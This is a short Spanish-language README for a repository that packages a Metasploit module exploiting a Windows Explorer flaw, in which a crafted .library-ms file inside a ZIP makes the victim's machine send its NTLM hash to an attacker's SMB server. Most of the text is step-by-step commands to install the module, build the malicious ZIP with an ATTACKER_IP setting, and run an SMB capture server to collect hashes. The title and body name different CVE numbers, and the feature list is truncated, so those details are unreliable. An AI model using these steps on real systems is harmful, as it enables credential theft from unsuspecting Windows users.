
POC para CVE-2025-24054
Este repositorio contiene un módulo de Metasploit para explotar CVE-2025-24071, una vulnerabilidad en el Explorador de Windows que filtra hashes NTLM cuando un archivo .library-ms malicioso se extrae de un archivo ZIP.
Desarrollado por: FOLKS-IWD
La vulnerabilidad ocurre cuando un usuario extrae un archivo ZIP que contiene un archivo .library-ms especialmente diseñado. El Explorador de Windows inicia automáticamente una solicitud de autenticación SMB a un servidor remoto especificado en el archivo, filtrando el hash NTLM del usuario sin ninguna interacción por parte de este.
Este módulo de Metasploit:
.library-ms malicioso.
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
use auxiliary/server/ntlm_hash_leak
set ATTACKER_IP 192.168.1.162 # Reemplaza con tu dirección IP
set FILENAME exploit.zip # Nombre del archivo ZIP malicioso
set LIBRARY_NAME malicious.library-ms # Nombre del archivo .library-ms
set SHARE_NAME shared # Nombre del recurso compartido SMB
run
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Igual que ATTACKER_IP
run